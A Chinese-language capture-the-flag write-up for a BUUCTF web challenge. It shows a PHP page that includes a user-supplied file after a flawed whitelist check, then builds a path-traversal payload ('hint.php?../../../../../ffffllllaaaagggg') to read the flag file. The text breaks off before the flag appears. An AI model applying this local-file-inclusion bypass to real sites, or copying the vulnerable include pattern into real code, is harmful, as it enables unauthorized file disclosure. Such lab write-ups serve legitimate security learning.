来源:BUUCTF
进入页面:
F12查看源代码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<!--source.php-->
<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
第10行可见提示要我们进入./source.php
进去后可以看见代码:
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
//白名单过滤
if (in_array($page, $whitelist)) {
return true;
}
//问号过滤
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
//白名单过滤
if (in_array($_page, $whitelist)) {
return true;
}
//URL编码
$_page = urldecode($page);
//问号过滤
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
//白名单过滤
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
最后一部分
1 if (! empty($_REQUEST['file'])
2 && is_string($_REQUEST['file'])
3 && emmm::checkFile($_REQUEST['file'])
4 ) {
5 include $_REQUEST['file'];
6 exit;
7 } else {
8 echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
9 }
可知,file不能为空值,且file的属性应为字符串,file还应该在emmm类的checkFile里通过
往上翻看到emmm类的checkFile方法时:hint应该是hint.php
所以我们再次构建网址为:http://1a362e26-a1a1-428b-93f4-f7f849b9090f.node3.buuoj.cn/index.php?file=hint.php
登进去以后发现
反过头来接着看souce.php的代码,发现经过了白名单过滤、URL编码、问号过滤、白名单过滤、问号过滤、白名单过滤
所以最终构造:hint.php?../../../../../ffffllllaaaagggg
得到flag: